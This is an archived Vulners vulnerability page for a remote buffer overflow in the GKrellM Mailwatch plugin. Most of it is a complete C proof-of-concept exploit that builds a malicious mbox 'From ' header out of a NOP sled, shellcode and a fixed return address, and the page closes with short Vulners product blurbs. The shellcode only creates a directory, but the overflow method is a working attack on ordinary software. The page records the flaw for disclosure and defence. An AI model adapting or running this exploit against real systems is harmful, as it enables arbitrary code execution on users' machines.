Vulners
Lucene search
GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow Vulnerability
source: http://www.securityfocus.com/bid/8118/info
It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program.
/*
* Proof of Concept code for a buffer overflow in gkrellm plugin gkrellm-mailwatch 2.4.2
*
* Overflow occurs in when processing the "From " (not "From: ")
* field of the email. This is remotely exploitable if you can pass
* shellcode through the mail servers with out it getting foobar'ed
* in the process.
*
* Since this is just POC, this will create a directory called hacked in gkrellm's CWD.
*
* One last note, it appends to the file you create, so feel free to append to
* your /var/spool/mail entry.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET 0xbffff36d
#define NOP 0x90
#define LEN 520
/* Zillion's mkdir hacked from www.safemode.org */
char code[]=
"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
"\x61\x63\x6b\x65\x64\x23";
int main(int argc, char **argv) {
int i = 0, offset = 0;
char ch, *mfile = NULL, *p = NULL, buf[5 + LEN + 6 + 2 + 3 + 1 + 3 + 2 + 1 + 8 + 1 + 4 + 2]; // From %[email protected] Thu Jun 26 16:45:16 2003\n\0
long ret = RET, *paddr = NULL;
FILE *fd;
if(argc < 2) {
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
exit(1);
}
while((ch = getopt(argc, argv, "m:o:h")) != -1) {
switch(ch) {
case 'h':
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
exit(1);
break;
case 'o':
ret -= atoi(optarg);
break;
case 'm':
if(!(mfile = malloc(strlen(optarg)+1))) {
perror("malloc");
exit(1);
}
strcpy(mfile, optarg);
break;
}
}
if(!mfile) {
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
exit(1);
}
fprintf(stderr, "[+] ret 0x%lx\n", ret);
strcpy(buf, "From ");
p = buf + 5;
// nops
for(i=0; i<LEN-strlen(code)-4; i++)
*(p++) = NOP;
// shellcode
for(i=0; i<strlen(code); i++)
*(p++) = code[i];
// address
paddr = (long *)p;
for(i=0; i<4; i+=4)
*(paddr++) = ret;
// terminate and concatenate
*(p+4) = 0;
strcat(buf, "@foo.bar Thu Jun 26 16:45:16 2003\n");
// check for an outfile, otherwise send to stdout
if(mfile) {
if(!(fd = fopen(mfile, "a"))) {
perror("fopen");
exit(1);
}
fprintf(stderr, "[+] out %s\n", mfile);
} else {
fd = stdout;
fprintf(stderr, "[+] out stdout\n");
}
fputs(buf, fd);
fputs("Return-Path: <[email protected]>\n", fd);
fputs("Received: from localhost (localhost [127.0.0.1])", fd);
fputs("\tby localhost (8.12.4/8.12.4) with ESMTP id h5QNPG2q003945\n", fd);
fputs("\tfor <[email protected]>; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
fputs("Received: (from [email protected])\n", fd);
fputs("\tby localhost (8.12.4/8.12.4/Submit) id h5QNPGuc004172\n", fd);
fputs("\tfor root; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
fputs("Date: Thu, 26 Jun 2003 16:45:12 -0700\n", fd);
fputs("From: [email protected]\n", fd);
fputs("Message-Id: <200306262325.h5QNPGuc003744@localhost>\n", fd);
fputs("To: [email protected]\n", fd);
fputs("Subject: foobar\n\n", fd);
fputs("foobar\n\n", fd);
fclose(fd);
free(mfile);
exit(0);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1